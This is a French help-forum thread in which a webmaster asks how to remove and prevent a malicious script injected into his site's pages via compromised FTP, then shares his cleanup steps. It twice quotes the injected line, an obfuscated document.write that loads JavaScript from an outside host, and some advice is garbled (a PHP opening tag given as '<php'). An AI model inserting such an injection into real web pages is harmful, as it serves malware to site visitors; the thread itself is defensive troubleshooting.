Code susceptible d'être infecté

Résolu/Fermé
Utilisateur anonyme - Modifié par irongege le 9/02/2011 à 23:46
 Utilisateur anonyme - 11 nov. 2010 à 11:06
Bonjour,

Je recherche comment supprimer et surtout empêche que se code revienne sur mon FTP.

Code susceptible d'être infecté.

document.write('<sc'+'ript type="text/javascript" src="http:
//alienradar.ru/Cc.js"></scri'+'pt>');


effectivement se code se place sur toute mes pages index, jquery.js, et jscroller.js et surtout me mais une interdiction sur les moteur de recherche .

Page malveillante !

La page Web sur www.tchat-fusion.org a été signalée comme étant une page malveillante et a été bloquée sur la base de vos préférences de sécurité.

Les pages malveillantes essaient d'installer des programmes qui volent des informations personnelles, qui utilisent votre ordinateur pour en attaquer d'autres ou qui endommagent votre système.

Certaines pages distribuent intentionnellement des logiciels malfaisants, mais beaucoup sont compromises sans la permission de leurs propriétaires ou sans qu'ils en aient connaissance.


Donc avais vous une solution pour se protéger pour se style d'attaque sur FTP ?

Cordialement Stéphane

A voir également:

2 réponses

avion-f16 Messages postés 19249 Date d'inscription dimanche 17 février 2008 Statut Contributeur Dernière intervention 15 juin 2024 4 503
22 sept. 2010 à 21:23
0
Bonjour,
merci pour le lien.
Je rajoute quand même se que j'ai fait si cela peut aidé une autre personne.
perso on et 2 qui on les passe FTP.

1er impérative changer les passe FTP etc...

2eme se qui étais mon cas vérifier 1 par 1 vos lien oui c'est long mais grâce a sa j'ai trouvé un faille ou il y avais mon passe et mon login a cause d'un simple code qui étais mal codé voir mon code en dessous :

$sql_serveur = "localhost"; // Serveur mySQL
$sql_base = "Nomdelabase"; // Base de donnees mySQL
$sql_login = "Nomdelabase"; // Login de connection a mySQL
$sql_password = "Lepasse"; // Mot de passe pour mySQL
// Connection au serveur mySQL
$connect_compt = @mysql_connect($sql_serveur, $sql_login, $sql_password) or
@mysql_select_db($sql_base);
//Décompte du nombre de connectés
$query_nb_connect = "SELECT ip_connect FROM nb_connect";
//Fermeture Mysql
mysql_close($connect_compt) ;

Comme vous pouvez le voir mon code a aucune balise ouverture et fermeture donc lisible a tout moment simplement en rentrent le lien direct Monlien/mapage.php ( j'ai pas tout mis le code juste mis le début et la fin) donc code incomplet pour évité que sa pourri cette aide


3eme Télécharger tout votre FTP sur votre ordinateur ouvrir les pages 1 a 1 et supprimer tout les code qui son infecté en générale son en bas de page avec un code comme ça :

document.write('<sc'+'ript type="text/javascript" src="http:
//alienradar.ru/Cc.js"></scri'+'pt>');


4eme une fois que tout et corriger remettre sur votre ftp une fois que c'est ok demandé a Google de faire un examen de votre site:

5eme si sa fonctionne demandé a se qui avais les passes supprimer leur sauvegarde et de vérifier si on pas des dossier infecté et donner leur le nouveau passe qui puisse faire la nouvelle sauvegarde et travailler dans les bonne condition.

Enfin !!! lol après juste pour info mon ami qui gère le FTP avec moi lui envoyer un virus avec filezilla sans le savoir donc je lui et fait prendre WinSCP (est un client SFTP graphique pour Windows. Il utilise SSH et est open source) pour ma par qui et un peut mieux que filezilla.

WinScp :
Arrive a effacer certain dossier que filezilla n'arrive pas et lit les fichier cacher inclus par défaut.

Cordialement Stéphane
0
pouvez vous me dire comment fermer cette avec des balise le code? merci
0
Utilisateur anonyme
11 nov. 2010 à 11:06
Bonjour
il faut mettre <php au début et ?> a la fin

mes excuse j'avais pas vue la réponse :/

Cordialement Stéphane
0